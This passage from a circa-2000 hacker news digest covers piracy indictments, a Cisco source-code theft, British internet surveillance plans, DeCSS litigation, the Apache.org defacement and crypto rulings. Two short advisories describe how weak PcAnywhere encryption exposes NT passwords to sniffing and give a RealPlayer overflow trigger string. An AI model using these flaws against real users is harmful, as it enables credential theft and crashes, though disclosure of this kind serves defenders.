Intel Corp. who allegedly exchanged hardware for access to an array of
pirated software. A federal grand jury in Chicago indicted 17 people,
including a former Microsoft Corp. employee and two Europeans, for
allegedly infringing the copyright on more than 5,000 computer software
programs. Of those indicted, 12 were allegedly members of the group known
as �Pirates with Attitudes� (PWA), a software piracy ring that was
infiltrated by government investigators last year. Their Web site,
identified by prosecutors as �Sentinel� or �WAREZ�, was located on a
computer at the University of Sherbrooke in Quebec and accumulated software
that was stripped of its embedded copy protection by members. Programs
available for downloading to those provided access via a secure Internet
protocol address included operating systems, applications such as word
processing and data analysis, games and MP3 music files, prosecutors said.
Four employees of Santa Clara, California-based Intel shipped hardware to
the site in Canada in 1998 to give it more storage capacity. In exchange,
they and other Intel employees were to be given access to the pirated
software, which a fifth employee allegedly arranged. The company was
unaware of the scheme, prosecutors said. Microsoft Employee Implicated
Another defendant was an employee of Redmond, Washington-based Microsoft
Corp. who allegedly supplied bootleg copies of the software giant�s
products for the site. He also allegedly gave access to Microsoft�s
internal network to the ringleader of PWA. The alleged ringleader, Robin
Rothberg, 32, also known by the online moniker �Marlenus,� of North
Chelmsford, Massachusetts, was charged in February with conspiring to
violate the copyrights on thousands of computer programs. He has been out
of jail on bond but was summoned to appear in Chicago. Among those indicted
were alleged PWA members from Belgium and Sweden. Last year, the Justice
Department said it was launching an initiative to combat piracy and
counterfeiting of intellectual property. �This is the most significant
investigation of copyright infringement involving the use of the Internet
conducted to date by the FBI,� said Kathleen McChesney, head of the FBI�s
Chicago office. If convicted, the defendants could spend five years in
prison and pay a $250,000 fine, or they could be ordered to pay a fine
totaling twice the gross gain to any defendant or twice the gross loss to
any victim, whichever is greater.
@HWA
158.0 [HNN] Cisco Insider Convicted of Stealing PIX Source
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 5th
contributed by acopalyse
A former employee of Cisco Systems has been found guilty by a jury in
Santa Clara County Superior Court of stealing the source code to
Private Internet Exchange (PIX). the source code was estimated to be
worth billions of dollars. (Yes, that is a B.)
San Jose Mercury News
http://www.mercurycenter.com/svtech/news/front/docs/cisco050300.htm
Url fucked off
@HWA
159.0 [HNN] British Plan to Monitor Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 5th
contributed by The Hex
The British are building the Government Technical Assistance Centre to
eavesdrop on all information sent over the Internet in Britain. The
system will be centered in the headquarters of MI5, the British secret
service agency. All of Britain's Internet Service Providers will be
connected to the GTAC through dedicated lines (which they will have to
pay for themselves). The government insists that when the system is
finished by the end of this year that absolutely nothing will be
intercepted without a warrant. (Uh huh, sure.)
Wired
http://www.wired.com/news/business/0,1367,36031,00.html
Brits Launch Online Spy Network Wired News Report 3:00 a.m. May. 2, 2000
PDT
A few weeks back, Russia's secret service agency raised privacy watchdogs'
hackles when it admitted it could intercept and monitor all Russian
Internet traffic.
On Sunday the British government acknowledged that it was building a
system that could do the same thing in Great Britain, ostensibly to help
catch money launderers, terrorists, pedophiles, and other criminals who do
business online.
It also could help usher in an era of Orwellian surveillance, privacy
advocates fear.
"They've taken a lead from the KGB," said Jason Catlett, president of
Junkbusters, an online privacy advocacy group.
The British system, called the Government Technical Assistance Centre,
will have its hub in the headquarters of the MI5, the British secret
service agency. All of Britain's Internet Service Providers will be
connected to the GTAC through dedicated lines (which they will have to pay
for themselves).
After its scheduled completion by the end of the year, the system will
allow British police and secret service agents to intercept every bit of
the country's Internet traffic. That could include email, credit card
transactions, banking data -- any information exchanged between computers
on the Web.
But absolutely nothing will be intercepted without a warrant, the British
government insists.
"There's no way (the security services) are going to be trawling through
everybody's emails," said a government spokeswoman. "Every intercept will
be obtained in the same way it is now: a warrant has to be signed by the
secretary of state." It's no different than tapping phone lines, the
government insisted.
Despite the government's assurances, legal experts warn that the system
could be easily abused.
"It sounds reasonable -- catch terrorists, criminals, and so on -- but it
has the potential to be particularly unreasonable," said Brian Smith, an
international e-commerce and banking attorney with the Washington-based
law firm Mayer Brown & Platt.
"They will know where people are putting their money, how they're
spending, who they're talking to." Security agents might be tempted to
access information without a warrant, or might obtain warrants on dubious
pretexts.
Moreover, Net users and business all over the world could potentially be
effected by the system.
"This is not just a matter for the U.K.," Smith said. "They'll be able to
see everything that goes through the U.K. A multinational company may be
sending confidential information about its business plans through the
U.K., and who knows what might happen? Just look at how the U.S.
government has used employee emails in its case against Microsoft."
The British government's acknowledgment of its planned system is sure to
re-ignite speculation about the existence of Echelon, a supposed
international electronic surveillance network.
Privacy advocates and a number of politicians are convinced that the
system exists, but government officials in Europe and the United States
have repeatedly denied it.
Reuters contributed to this report.
@HWA
160.0 [HNN] MPAA Tries to Ban 2600 Lawyer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 5th
contributed by Macki
The MPAA has filed a motion to disqualify the high profile lawyer
retained by 2600 in its fight over DeCSS. The MPAA suit alleges that
Martin Garbus' firm can not represent 2600 due to a conflict of
interest.
2600.com
This legal brief is immense but it is a tour de force for reverse
engineering and fair use rights. Lets hope the court agrees!
Definately recomended reading for anyone interested in this case.
Cryptome
http://www.2600.com/news/2000/0505.html
http://cryptome.org/mpaa-v-2600-rb.htm
@HWA
161.0 [HNN] Apache.org Defaced
~~~~~~~~~~~~~~~~~~~~~~~~
May 5th
(My story seems to have been ripped since the info/article i sent on
this to them shows through in this text, thats 'ok' I suppose ...
isn't it? - Ed)
contributed by McIntyre
Home of the popular Apache software was defaced last month by a group
of determined individuals. Unlike an ordinary intrusion that uses
scripts or vulnerabilities in the operating system these hackers
focused solely on configuration errors to change the 'Powered by
Apache' logo to 'Powered by Back Office' (Yes, this was actually a
hack and not a scritp kiddie clicking a mouse button.)
Attrition.org - Mirror of Defaced Site
Dataloss.net - How they did it.
http://www.attrition.org/mirror/attrition/2000/05/03/www.apache.org/
http://www.dataloss.net/papers/how.defaced.apache.org.txt
@HWA
162.0 [HNN] Voice Security on the Cheap
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 5th
contributed by dark_wyrm
Starium, a company based in Monterey, CA, plans to sell telephone
scrambling devices that connect to the handset of any telephone. The
units would compress, filter, and encrypt voice communications.
Starium claims that there is no NSA backdoor. Retail price for the
unit is expected to be less than $100.
Wired
http://www.wired.com/news/technology/0,1282,21236,00.html
Starium Promises Phone Privacy by Declan McCullagh 3:00 a.m. Aug. 12,
1999 PDT MONTEREY, California -- The sleepy coastal town of Monterey,
California, is not the kind of place where vision-fired entrepreneurs
come to change the world. Monterey Bay is better known for sea lions
than silicon, and for Cannery Row -- made famous half a century ago
in John Steinbeck's gritty, eponymous novel.
Today, the third floor of a converted sardine factory on Cannery Row is
home to a startup company developing what could become a new world
standard in privacy protection. By early 2000, Starium Inc. plans to begin
selling sub-US$100 telephone scrambling devices so powerful that even the
US government's most muscular supercomputers can't eavesdrop on wiretapped
conversations.
Such heavily armored privacy is currently available only to government and
corporate customers who pony up about $3,000 for STU-III secure phones
created by the US National Security Agency. By squeezing the same kind of
ultra-strong encryption into a sleek brushed-steel case about twice the
size of a Palm V -- and crafted by the same San Francisco designer --
Starium hopes to bring crypto to the masses.
"Americans by nature don't like people reading over their shoulders," says
Lee Caplin, president and CEO of Starium.
True enough. But whether Americans will pay extra for privacy is open to
question, especially since both people in a conversation need the Starium
"handsets" to chat securely.
And there's another big obstacle: The US government has repeatedly tried
to keep similar products off the market unless they have a backdoor for
surveillance. Its export rules prevent Starium from freely shipping its
products overseas.
Starium's three co-founders -- the company has since grown to eight people
-- claim they're not fazed.
"The technology is out there. Whether they like it or not, it exists,"
says Bernie Sardinha, Starium chief operations officer. "You cannot stop
progress. You cannot stop technology."
Starium at first planned to call its product CallGuard, but abandoned the
name after discovering another company owned the trademark. The firm is
considering VoiceSafe as another potential name.
Customers will use the device by plugging it into their telephone handset
-- a feature allowing it to work with office systems -- and plugging the
handset into the base of the phone.
At the touch of a "secure" button, the modems inside the two Starium units
will form a link that, theoretically, creates an untappable communications
channel. The units digitize, compress, filter, and encrypt voice
communications -- and reverse the process on the other end.
The Starium handset uses a 2,048-bit Diffie-Hellman algorithm for the
initial setup, and a 168-bit triple DES algorithm for voice encoding. The
four-chip unit includes a 75 MHz MIPS processor, an infrared interface, a
smart card port, and possibly serial, USB, and parallel interfaces, the
company says. The final version will operate for over 2 hours on a pair of
AA batteries.
Starium's business plan is nothing if not ambitious. In addition to
selling the portable units, the company wants to add crypto capabilities
to cell phones, faxes, and even corporate networks. Target markets include
the legal, medical, banking, and even political fields.
"I've gotten a call from the George W. Bush people for use in the
campaign," CEO Caplin says.
The company says it's working on deals with major cell phone manufacturers
like Ericsson and Nokia to offer the same voice-scrambling in software.
Newer cell phones have enough memory and a fast enough processor to handle
the encryption. Best of all, a software upgrade could be free.
"You take your phone into a mall or a kiosk and they simply burn in the
new flash ROM," Sardinha says.
The idea for Starium came from longtime cypherpunk and company co-founder
Eric Blossom, who was inspired by the Clinton administration's
now-abandoned Clipper Chip plan to devise a way to talk privately.
"I got interested around the time of Clipper. I was scratching my head
saying, 'This is offensive,'" says Blossom, a former engineer at Hewlett
Packard and Clarity Software.
Blossom created prototype devices and sold them online. But they were
clunky -- about the size of a desktop modem. They were also expensive, and
didn't sell very well.
The company's directors include Robert Kohn, former chief counsel for PGP
and Borland International, and Whitfield Diffie, distinguished engineer at
Sun Microsystems and co-inventor of public key cryptography.
@HWA
163.0 [HNN] Takedown Reviewed
~~~~~~~~~~~~~~~~~~~~~~~
May 5th
contributed by William Knowles
The movie 'Takedown', which details the pursuit and capture of Kevin
Mitnick and is based on the Markoff book of the same name, is starting
to get a little press potentially in anticipation of its US debut. The
movie has already been released in France and has received less than
stellar reviews.
San Francisco Chronicle
http://www.sfgate.com/cgi-bin/article.cgi?file
Url deceased
@HWA
164.0 [HNS] Apr 8:NEW KIND OF SECURITY SCANNER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Saturday 8 April 2000 on 3:33 AM
ISS is offering an on-line scanner for Web sites which surveys users'
hard drives to detect any potentially dangerous programs, such as
Trojans and viruses, that may have been placed on the machine without
their knowledge.
Link: The Register
http://www.theregister.co.uk/000407-000033.html
Dead url
@HWA
165.0 [HNS] April 8:WAYS TO ATTACK
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Saturday 8 April 2000 on 3:32 AM
Following recent high-profile Web security breaches, Enstar, an
e-security firm, hosted a live demonstration in San Antonio Friday to
show the many ways hackers break into systems.
Link: CRN
http://www.crn.com/dailies/digest/breakingnews.asp?ArticleID
Bad url/server error
@HWA
166.0 [HNS] April 7:STOLEN ACCOUNTS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Friday 7 April 2000 on 6:50 PM
"Malicious hackers" from overseas have been racking up surfing bills
for unsuspecting SingNet customers by using their Internet accounts,
The Straits Times has found out.
Link: The Straits Times
http://www.straitstimes.asia1.com/singapore/sin20_0407.html
Dead url
@HWA
167.0 [HNS] April 7:JAILED FOR SIX MONTHS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Friday 7 April 2000 on 6:48 PM
Po Yiu-ming, 19, who was among the first three hackers to be convicted
since computer crime-related laws were enacted in 1994, was jailed for
six months yesterday.
Link: SCMP
http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000406015347330.asp
Dead url
@HWA
168.0 [HNS] April 7: PcANYWHERE WEAK PASSWORD ENCRYPTION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Friday 7 April 2000 on 4:27 PM
PcAnywhere 9.0.0 set to its default security value uses a trivial
encryption method so user names and password are not sent directly in
clear. Since most users have the encryption methods set to either
"none" or "PcAnyWhere", their password are sent with weak encryption.
Link: Bugware
http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid955117228,48342,
PcAnywhere weak password encryption Posted to BugTraq on 7.4.2000
PcAnywhere 9.0.0 set to its default security value uses a trivial
encryption method so user names and password are not sent directly in
clear. Since most users have the encryption methods set to either "none"
or "PcAnyWhere", their password are sent with weak encryption.
A major concern lies in the fact that PcAnywhere can authenticate users
based on their NT domain accounts and passwords. When the user logs on, it
is prompted for its NT username and password. They are then "encrypted"
through the PcAnywhere method and decrypted by the host computer for
validation by the NT domain controller. Someone snooping on the traffic
between the two stations will unlock both the PcAnywhere and NT account.
All that without even having to go through the L0phtCrack process.
Version 7.0 is not at risk since no encryption is used at all. Username
and password are sent in clear. I haven't tested version 8 yet.
--- Solution --- Symantec says that this was not intended to be real
encryption and suggest the use of the Public or Symetric key option
instead. More info can be found at :
http://service1.symantec.com/SUPPORT/pca.nsf/docid/ 1999022312571812&src=w
@HWA
169.0 [HNS] April 7: NET PRIVACY TOOLS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Friday 7 April 2000 on 3:46 PM
Microsoft promised free Internet tools based on emerging privacy
standards for controlling how much information people using the Web
reveal.
Link: CNET
http://news.cnet.com/news/0-1005-200-1655289.html?dtn.head
Microsoft plans free Net privacy tools By The Associated Press Special to
CNET News.com April 7, 2000, 4:50 a.m. PT TORONTO--Microsoft promised free
Internet tools based on emerging privacy standards for controlling how
much information people using the Web reveal.
Coming from the world's largest software company, the tools could give
impetus for Web sites and other companies to embrace the Platform for
Privacy Practices, or P3P. The World Wide Web Consortium, an Internet
standards group, may finalize P3P this summer.
Richard Purcell, Microsoft's chief privacy officer, said the tools will
help consumers better understand how sites track visits and pass along
information to other parties.
A formal announcement is expected in a few weeks. Purcell disclosed the
company's intent during an interview yesterday at the Computers, Freedom
and Privacy conference here, meeting through today.
People using the Internet are increasingly concerned about Web sites that
create profiles of email addresses, favorite books and clothing sizes for
marketing purposes.
Sites often disclose their intent in privacy statements that are difficult
to find and understand. The Microsoft tools, to be released this fall,
will translate such statements into machine-readable form and let Internet
surfers block access to sites that collect too much.
With the software, people using the Web can state what types of
information they are willing to give, as well as whether they mind sharing
that information with outside parties. Internet surfers will receive a
warning before visiting sites that go beyond that level.
Microsoft plans to make the tools for its browser, Internet Explorer, and
for the competing Netscape browsers.
Lorrie Cranor, who heads a P3P
Lorrie Cranor, chair of the P3P specification working group at the W3C,
discusses the proposed privacy standard.
working group, considered Microsoft's decision important, saying, "In
order for P3P to be widely used, there has to be good user software
available.
"The question I always get is, 'Is Microsoft going to implement it?'" she
said.
Still, critics believe Web sites won't have incentives to join, rendering
such tools and standards meaningless. Jason Catlett, president of
Junkbusters and a critic of P3P, said wide adoption remains years away.
Copyright � 2000 Associated Press. All rights reserved. This material may
not be published, broadcast, rewritten, or redistributed.
@HWA
170.0 [HNS] April 7:SECURITY ADDITIONS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Friday 7 April 2000 on 3:45 PM
Cisco Systems next week plans to ramp up its VPN security with a new
addition to its PIX firewall line as well as an updated version of its
Secure Policy Manager software for enterprise users.
Link: InfoWorld
http://www.infoworld.com/articles/en/xml/00/04/06/000406enciscofirewall.xml
Cisco plans firewall addition for small businesses
By Cathleen Moore
CISCO SYSTEMS NEXT week plans to ramp up its VPN (virtual private network)
security with a new addition to its PIX firewall line as well as an
updated version of its Secure Policy Manager software for enterprise
users.
The Cisco PIX Firewall 506 will bring a low-end offering aimed at small
businesses and branch offices to the company's existing firewall set.
Other products in the family include the PIX 515, targeted at small and
midsize enterprises, and the Secure PIX 520, which is designed for large
enterprise installations.
With its newest firewall member, Cisco is attempting to tap into small
business environments, which -- with increasing reliance on the Internet
-- are seeking more powerful security solutions for remote access
technologies and VPN. About the size of a hardback, the PIX 506 can handle
throughput of 10Mbps and 3DES encryption at rates of 4Mbps, according to
Cisco. The 506 firewall holds a 200MHz Intel Pentium III processor, 32MB
of RAM, and two integrated Fast Ethernet ports.
Version 2.0 of Cisco Secure Policy Manager adds improved scalability and
additional support for IPsec VPN configurations in Cisco's routers and
firewalls. The Policy Manager lets IT managers define and audit network
security policies from a central location, according to the company. The
product also can simplify deployment of security services supported by
Cisco's firewalls and IOS-based VPN routers, Cisco said.
The Cisco Secure PIX Firewall 506 will be available in May, priced
starting at $1,950. The Secure Policy Manager 2.0 will begin shipping this
month, priced at $7,500.
Cisco Systems Inc., in San Jose, Calif., is at www.cisco.com.
Cathleen Moore is an InfoWorld reporter.
@HWA
171.0 [HNS] April 7:COOKIES
~~~~~~~~~~~~~~~~~~~~~
by BHZ
Friday 7 April 2000 on 3:43 PM
You say you don't like browser cookies? You're not quite sure if that
program you download from the Net is revealing more about you than it
should? Wired has an article about it and we had a discussion on them
on our forum.
Link: Wired on cookies
Link: HNS forum
http://www.wired.com/news/politics/0,1283,35498,00.html
http://default.net-security.org/phorum/read.php3?num
Getting Snooped On? Too Bad by Declan McCullagh 3:00 a.m. Apr. 7, 2000 PDT
TORONTO -- You say you don't like browser cookies? You're not quite sure
if that program you download from the Net is revealing more about you than
it should?
Well, here's something to make you really nervous: In the United States,
it may be illegal to disable software that snoops on you.
The folks who came up with this idea turn out to be the large corporations
that helped to draft the Digital Millennium Copyright Act (DMCA), which
restricts some forms of tampering with copyright protection devices.
In some cases, that means you won't be able to turn off any surveillance
features it might include, according to participants in a Thursday
afternoon panel at the Computers, Freedom and Privacy conference.
"Privacy circumvention is possible only under a limited circumstance,"
said Paul Schwartz of the Brooklyn Law School.
As more and more copyrighted material makes its way online, content owners
are turning to encryption to protect their works from widespread illicit
redistribution.
Stephen King distributed his recent novel online in encrypted form, and
music companies are backing Secure Digital Memory Card for audio players.
Privacy advocates fret that if future works are secure and thus protected
under the DMCA, they could reveal consumers' private behavior
--RealNetworks' RealJukebox player secretly did just that -- and tinkering
with the program to turn off the reporting mechanism would be illegal.
"The practical impact is it's another area we're going to be fighting
about," Schwartz said.
The DMCA, which became law in October 1998, does allow some very limited
forms of privacy circumvention. You're allowed to do it if the software
leaks "personally identifying information" about you without giving you
the ability to say no, and if you're not "in violation of any other law."
But here's the rub: Many, if not most, programs include shrink-wrap
licenses that prohibit reverse-engineering or altering the program.
Some courts have said that shrink-wrap licenses -- software license
agreements that don't require a signature -- are binding. If you violate
them, would you be able to take advantage of the DMCA's
privacy-circumvention loophole?
The answer may well be yes. "The statute is basically totally incoherent,"
says Pam Samuelson, a professor at the University of California at
Berkeley and an influential copyright scholar.
"We're getting tortured by laws that are inherently incoherent,"
complained Barry Steinhardt, associate director of the ACLU.
Violating the DMCA is a civil offense, and "willfully" violating it for
private financial gain is a criminal offense punishable by five years in
jail and a $500,000 fine.
@HWA
172.0 [HNS] April 7:SECURE E-MAIL SERVICE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Friday 7 April 2000 on 3:39 PM
The Royal Mail has launched a secure e-mail service through its secure
technology service, ViaCode.
Link: Silicon.com
http://www.silicon.com/public/door?REQUNIQ
@HWA
173.0 [HNS] April 7:ONLINE MUGGERS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Friday 7 April 2000 on 3:38 PM
"You are running a Web site. Making money perhaps, and visitors are
seeing your message. Then, according to your perimeter
intrusion-detection device, some online goofball or criminal hacker is
beating on your door. What are you going to do?" Read Winn Schwartau's
article.
Link: IDG.net
http://www.idg.net/servlet/ContentServlet?global_doc_id
Url was eaten by an AOL hax0r or some shit
@HWA
174.0 [HNS] April 6:SURVEY BY DTI
~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Thursday 6 April 2000 on 3:00 PM
British companies are too complacent when it comes to Internet
security and only have themselves to blame if their IT systems are
compromised by hackers. That is one of the conclusions published by
Department of Trade and Industry. Contributed by Lady Sharrow.
Link: The Register
http://www.theregister.co.uk/000406-000023.html
Dead url
@HWA
175.0 [HNS] April 6: COMPUTER CODES PROTECTED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Thursday 6 April 2000 on 1:58 PM
Computer programs used to scramble electronic messages are protected
by the First Amendment because those codes are a means of
communication among programmers, a federal appeals court ruled
Tuesday.
Link: Associated Press
http://www.worldnews.com/?action
Bad url
@HWA
176.0 [HNS] April 6: RELEASED AFTER CODE MACHINE THEFT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Thursday 6 April 2000 on 1:57 PM
A 50-year-old man has been released on police bail after being
questioned by detectives investigating the disappearance of the Enigma
encoding machine.
Link: BBC
http://news.bbc.co.uk/hi/english/uk/newsid_701000/701877.stm
Wednesday, 5 April, 2000, 12:53 GMT 13:53 UK Man released after code
machine theft
Bletchley Park: Centre for wartime code-breaking effort
A 50-year-old man has been released on police bail after being questioned
by detectives investigating the disappearance of the Enigma encoding
machine. The man, from Bedfordshire, was arrested on Tuesday and
released after questioning at Milton Keynes police station.
Police have mounted a massive search for the historic machine, which
cracked the Nazi Enigma code during the Second World War.
It was stolen in broad daylight from a glass cabinet at the Bletchley Park
museum on Saturday, where it was on display.
Police officers were preparing to trawl a lake on the estate and search
the mansion.
Thames Valley Police spokesman John Brett said: "A search of the mansion
and the grounds of Bletchley Park will start under the supervision of a
police search adviser and a team of 10 police officers.
The missing Enigma machine
"There is a possibility that a Thames Valley Police underwater search unit
may be used to search the lake in Bletchley Park.
"It could be hidden under the stairs in the mansion, there are lots of
places it could be."
Detectives think the thief could have abandoned the Enigma machine within
the 50-acre grounds of the estate, or in one of the 70 rooms in the
mansion.
The museum in Milton Keynes, Buckinghamshire, was raided in full view of
visitors during an open day on Saturday.
The Enigma - one of only three in the world - is worth up to �100,000 and
was used by the Germans to encrypt messages sent during the Second World
War.
Bletchley Park is believed to have shortened the war by cracking the code.
Detectives were appealing for any visitors on Saturday who took pictures
or video footage to contact police in the hope they might identify the
thief.
Reward offered
Mr Brett urged whoever stole the machine not to be tempted to destroy the
evidence in the light of massive publicity.
He added: "If it's a prank that's gone wrong, don't destroy it because our
main priority is getting it back."
A �5,000 reward is being offered by BT, owners of part of the site in
Milton Keynes since World War II.
"It is a tragedy that the machine has been stolen," Alan White, director
of BT's property division, said.
@HWA
177.0 [HNS] April 6:CYBERPATROL BLOCK LIST
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Thursday 6 April 2000 on 1:36 PM
Our affiliates at Security Watch wrote that a list of thousands of
hosts, websites and Usenet groups blocked by Microsystems Software
Inc.'s CyberPatrol software has been published on the web.
Link: Security Watch
http://www.securitywatch.com/scripts/news/list.asp?AID
skull fucked url
@HWA
178.0 [HNS] April 5:CRYPTO REGULATIONS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 5 April 2000 on 12:27 PM
Privacy advocates won a preliminary victory when for the second time a
federal appeals court questioned restrictions on data-scrambling
encryption software.
Link: Wired
http://www.wired.com/news/politics/0,1283,35425,00.html
Crypto Regs Challenged Again by Declan McCullagh 4:00 p.m. Apr. 4, 2000
PDT Privacy advocates won a preliminary victory when for the second time a
federal appeals court questioned restrictions on data-scrambling
encryption software.
The Sixth Circuit Court of Appeals suggested Monday that President
Clinton's restrictions on distributing encryption products might be
unconstitutional.
"Because computer source code is an expressive means for the exchange of
information and ideas about computer programming, we hold that it is
protected by the First Amendment," a three-judge panel said in a unanimous
17KB decision.
That decision reversed a July 1998 ruling by a federal district court.
And while the panel did not strike down the Clinton administration's
regulations, it did refer the matter back to U.S. District Judge James
Gwin for another hearing. Earlier Gwin had ruled the First Amendment did
not apply.
The Justice Department says source code is akin to instructions for a
machine, and rules governing its distribution are necessary for national
security reasons.
Now that the appeals court has ruled source code is protected by the First
Amendment, the government will have a much tougher time arguing it should
have the power to imprison a law professor for posting a book on his
website.
Peter Junger, a professor at Case Western University School of Law, sued
the federal government after it told him he needed a license to post a
chapter of his Computers and the Law textbook online.
The American Civil Liberties Union, which represents Junger, applauded the
ruling.
"This is a great day for programmers, computer scientists and all
Americans who believe that privacy and intellectual freedom should be free
from government control," said ACLU Legal Director Raymond Vasvari.
In a separate case that also challenges the criminal penalties the U.S.
government imposes for unauthorized encryption distribution, the 9th U.S.
Circuit Court of Appeals in May 1999 ruled that encryption source code was
speech protected by the First Amendment.
"We conclude that the challenged regulations allow the government to
restrain speech indefinitely with no clear criteria for review," the 9th
Circuit panel said in its decision in a case brought by math professor
Daniel Bernstein.
But it's not clear what happens next in either the Junger or Bernstein
cases. The Clinton administration relaxed the regulations in January, and
the move is likely to delay both lawsuits for some time.
In fact, the Commerce Department, which administers the regulations, says
that Bernstein no longer has anything to worry about.
"You ask for an advisory opinion in light of your concern that the new
regulations 'continue to interfere with Professor Bernstein's planned
scientific activities.' Your concerns are unfounded," a Commerce
Department Bureau of Export Administration official wrote to Bernstein's
lawyers in February.
Bernstein asked in March for a rehearing by the district court to take
into account the regulation changes.
@HWA
179.0 [HNS] April 5:GFI AND NORMAN TEAM UP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 5 April 2000 on 12:24 PM
GFI and Norman have teamed up to integrate the Norman Virus Engine
with GFI's e-mail security gateway, Mail essentials.
Link: ESJ
http://www.esj.com/breaknewsdisp.asp?ID
br0ked url
@HWA
180.0 [HNS] April 5:MASTERCARD OFFER VIRUS REPAIR SERVICE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 5 April 2000 on 12:23 PM
MasterCard has taken the unusual step of offering a free virus repair
service as a key feature in its small business card package.
Link: Computer Currents
http://www.currents.net/newstoday/00/04/05/news5.html
@HWA
181.0 [HNS] April 5: BUFFER OVERFLOWS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 5 April 2000 on 3:12 AM
A survey held amongst readers of the security/vulnerability report
list "Bugtraq" a few months ago approximately 2/3 of the respondents
thought the so-called "buffer overflows" to be the dominating security
problem. Read new Default article which deals with buffer overflows.
Link: Default
http://net-security.org/default/articles/09/02.shtml
@HWA
182.0 [HNS] April 5: PIRACY
~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 5 April 2000 on 12:11 AM
Washington state, with an economy that has boomed along with
Microsoft's, has launched a crackdown on state employees who illegally
circulate pirated software on government computers.
Link: APB News
http://www.apbnews.com/newscenter/internetcrime/2000/04/04/software0404_01.html
@HWA
183.0 [HNS] April 5:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 5 April 2000 on 12:05 AM
Certicom's ECC2k-108 Elliptic Curve Discrete Logarithm challenge has
been broken! This was the largest public calculation ever to use a
complex parallel algorithm. $5,000 dollars in winnings will be donated
to the Free Software Foundation.
Link: Slashdot
http://slashdot.org/article.pl?sid
@HWA
184.0 [HNS]: April 5:GROUP APPEALS DVD CRYPTO INJUNCTION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 5 April 2000 on 12:02 AM
Continuing its California courtroom battle against the Digital Video
Disk industry over DVD encryption codes, the Electronic Frontier
Foundation has appealed an injunction granted against more than 50 Web
site operators in January.
Link: Computer User
http://www.currents.net/newstoday/00/04/04/news7.html
@HWA
185.0 [HNS] April 5: VIRUS BLOWS A HOLE IN NATO'S SECURITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 5 April 2000 on 12:01 AM
The North Atlantic Treaty Organization has launched a full-scale
investigation into how one of its top-secret documents ended up posted
on the Internet. The Sunday Telegraph reports that an unknown virus is
to blame for the posting of the nine-page document, detailing the
alliance's rules of engagement in the southern Yugoslav province of
Kosovo, on to the Net.
Link: Computer User
http://www.currents.net/newstoday/00/04/04/news3.html
@HWA
186.0 [HNS] April 4: FIGHT SPAM WITH SPAM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Tuesday 4 April 2000 on 8:40 AM
Cisco Systems is urging victims of spam to take the law into their own
hands and deliver their own form of vengeance to combat unwanted
e-mails. This was taken from booklet 'The Easy Guide to Network
Security', which could be downloaded from their UK site.
Link: The Register
http://www.theregister.co.uk/000404-000001.html
@HWA
187.0 [HNS] April 4:REALPLAYER BUFFER OVERFLOW
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Tuesday 4 April 2000 on 8:10 AM
There is a buffer overflow in the Win32 RealPlayer Basic client,
versions 6 and 7. This appears to occur when >299 characters are
entered as a 'location' to play, such as http://aaaaa..... with 300
a's. If it is embed in an html page Internet Explorer alos crashes.
Link: Bugware
299 characters are entered as a 'location' to play, such as
http://aaaaa..... with 300 a's. If it is embed in an html page
Internet Explorer alos crashes.
http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid954828462,32898,
@HWA
188.0 [HNS] May 31st:NO PROBLEMS?
~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 6:46 PM
Microsoft says there are no problems with its e-mail software, even as
computer experts have come out in support of an Auckland software
designer who says its e-mail programs are dangerously flawed.
Link: NZ Herald
http://www.nzherald.co.nz/storydisplay.cfm?storyID
@HWA
189.0 [HNS] May 31:MS SECURITY BULLETIN #38
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 6:41 PM
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft Windows Media Encoder, which ships as
a component of the Windows Media Technologies. The vulnerability could
allow a malicious user to interfere with a digital content provider's
ability to supply real-time audio and video broadcasts.
Link: Read the advisory
http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid959791139,28208,
@HWA
